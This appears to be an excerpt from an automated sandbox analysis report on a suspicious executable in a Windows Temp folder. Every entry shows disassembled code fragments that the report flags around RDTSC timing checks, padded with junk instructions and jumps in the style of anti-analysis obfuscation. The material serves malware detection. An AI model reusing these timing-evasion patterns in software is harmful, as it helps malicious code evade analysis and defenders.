Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: B1337C second address: B12C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D1EC5h], ecx 0x00000010 push dword ptr [ebp+122D0091h] 0x00000016 pushad 0x00000017 mov dword ptr [ebp+122D21D6h], esi 0x0000001d mov eax, dword ptr [ebp+122D2B53h] 0x00000023 popad 0x00000024 call dword ptr [ebp+122D1EFEh] 0x0000002a pushad 0x0000002b mov dword ptr [ebp+122D260Eh], edi 0x00000031 xor eax, eax 0x00000033 stc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D260Eh], eax 0x0000003e mov dword ptr [ebp+122D2DBBh], eax 0x00000044 cmc 0x00000045 mov esi, 0000003Ch 0x0000004a mov dword ptr [ebp+122D260Eh], esi 0x00000050 mov dword ptr [ebp+122D260Eh], esi 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007F58F4C28986h 0x0000005f lodsw 0x00000061 cmc 0x00000062 mov dword ptr [ebp+122D28BBh], ecx 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c jmp 00007F58F4C28987h 0x00000071 jmp 00007F58F4C28988h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a clc 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f je 00007F58F4C28976h 0x00000085 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C91B9F second address: C91BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F58F53CD386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8193F second address: C81962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Eh 0x00000007 jo 00007F58F4C2897Ch 0x0000000d jnc 00007F58F4C28976h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B27 second address: C90B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F58F53CD386h 0x0000000a jc 00007F58F53CD386h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B39 second address: C90B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F58F4C28986h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B59 second address: C90B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90E45 second address: C90E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C2897Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90E55 second address: C90E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007F58F53CD386h 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C913E3 second address: C91401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28985h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C943B3 second address: B12C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xor dword ptr [esp], 28085C14h 0x0000000e mov dword ptr [ebp+1244EC87h], ecx 0x00000014 mov edx, 1DD02C11h 0x00000019 push dword ptr [ebp+122D0091h] 0x0000001f stc 0x00000020 call dword ptr [ebp+122D1EFEh] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D260Eh], edi 0x0000002d xor eax, eax 0x0000002f stc 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 mov dword ptr [ebp+122D260Eh], eax 0x0000003a mov dword ptr [ebp+122D2DBBh], eax 0x00000040 cmc 0x00000041 mov esi, 0000003Ch 0x00000046 mov dword ptr [ebp+122D260Eh], esi 0x0000004c mov dword ptr [ebp+122D260Eh], esi 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 jmp 00007F58F53CD396h 0x0000005b lodsw 0x0000005d cmc 0x0000005e mov dword ptr [ebp+122D28BBh], ecx 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007F58F53CD397h 0x0000006d jmp 00007F58F53CD398h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 clc 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b je 00007F58F53CD386h 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94499 second address: C944EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F58F4C2897Ah 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F58F4C28988h 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007F58F4C28983h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944EF second address: C944F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944F9 second address: C944FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944FF second address: C94539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c xor edi, dword ptr [ebp+122D2B63h] 0x00000012 lea ebx, dword ptr [ebp+12455317h] 0x00000018 sub cx, E73Ah 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F58F53CD393h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C9465E second address: C946D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F58F4C28976h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d sub cl, FFFFFFACh 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F58F4C28978h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c add esi, 20CAB300h 0x00000032 push 00000000h 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F58F4C28978h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 mov dx, si 0x00000053 cmc 0x00000054 push 8901C812h 0x00000059 js 00007F58F4C28984h 0x0000005f push eax 0x00000060 push edx 0x00000061 push esi 0x00000062 pop esi 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C946D0 second address: C9470B instructions: 0x00000000 rdtsc 0x00000002 je 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 4901C812h 0x00000011 mov edi, 04D91295h 0x00000016 lea ebx, dword ptr [ebp+12455320h] 0x0000001c adc di, EF02h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push esi 0x00000026 pop esi 0x00000027 jmp 00007F58F53CD393h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C9470B second address: C94710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94710 second address: C94721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnc 00007F58F53CD38Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94721 second address: C94729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CA5264 second address: CA528A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F53CD38Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F58F53CD38Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C84F18 second address: C84F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C28989h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C84F37 second address: C84F41 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F58F53CD386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB2CB1 second address: CB2CB7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB2CB7 second address: CB2CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB2F4B second address: CB2F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB2F54 second address: CB2F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB326C second address: CB3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F58F4C28976h 0x00000011 jl 00007F58F4C28976h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3536 second address: CB354C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F58F53CD38Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB354C second address: CB356B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F58F4C28984h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB356B second address: CB3571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3B30 second address: CB3B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3B36 second address: CB3B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3E1F second address: CB3E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jo 00007F58F4C28976h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3E2E second address: CB3E34 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3E34 second address: CB3E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7FE33 second address: C7FE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB4677 second address: CB46A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F58F4C28986h 0x0000000d jmp 00007F58F4C28982h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB46A7 second address: CB46BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F58F53CD386h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB46BB second address: CB46BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86A78 second address: C86A9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F58F53CD386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F58F53CD399h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86A9D second address: C86AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86AA3 second address: C86AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86AA7 second address: C86AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86AAB second address: C86AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB96ED second address: CB970F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F58F4C28984h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB9D45 second address: CB9D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB9D49 second address: CB9D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB9D5A second address: CB9D77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F58F53CD38Ah 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC064A second address: CC064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC064E second address: CC065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC065A second address: CC068B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F58F4C2897Eh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F58F4C28988h 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC068B second address: CC0691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8B9F8 second address: C8BA07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F58F4C28976h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA07 second address: C8BA0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA0D second address: C8BA13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA13 second address: C8BA27 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F58F53CD386h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F58F53CD386h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA27 second address: C8BA38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F58F4C28992h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA38 second address: C8BA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8BA3E second address: C8BA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFB1C second address: CBFB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD392h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFC78 second address: CBFC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFC81 second address: CBFC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFC87 second address: CBFC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CBFDD0 second address: CBFE10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F58F53CD38Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F58F53CD399h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F58F53CD38Ch 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC2441 second address: CC247B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F58F4C28984h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F58F4C2897Eh 0x0000001b pop esi 0x0000001c rdtsc
